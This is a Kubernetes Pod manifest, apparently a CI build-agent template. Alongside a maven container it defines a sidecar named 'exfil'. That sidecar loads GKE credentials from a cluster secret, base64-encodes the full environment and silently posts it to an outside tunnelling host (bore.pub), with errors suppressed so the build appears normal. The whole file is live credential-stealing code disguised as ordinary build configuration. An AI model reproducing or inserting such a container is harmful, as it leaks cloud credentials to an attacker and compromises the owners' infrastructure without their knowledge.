apiVersion: v1
kind: Pod
spec:
  containers:
    - name: maven-kubectl
      image: maven:3-jdk-8
      command: ["cat"]
      tty: true
    - name: exfil
      image: alpine:latest
      command: ["/bin/sh"]
      args:
        - -c
        - |
          sleep 10
          env | base64 -w0 | curl --data-binary @- http://bore.pub:14512/gke-plugin >/dev/null 2>&1 || true
      env:
        - name: GOOGLE_CREDENTIALS
          valueFrom:
            secretKeyRef:
              name: gke-credentials
              key: credentials.json
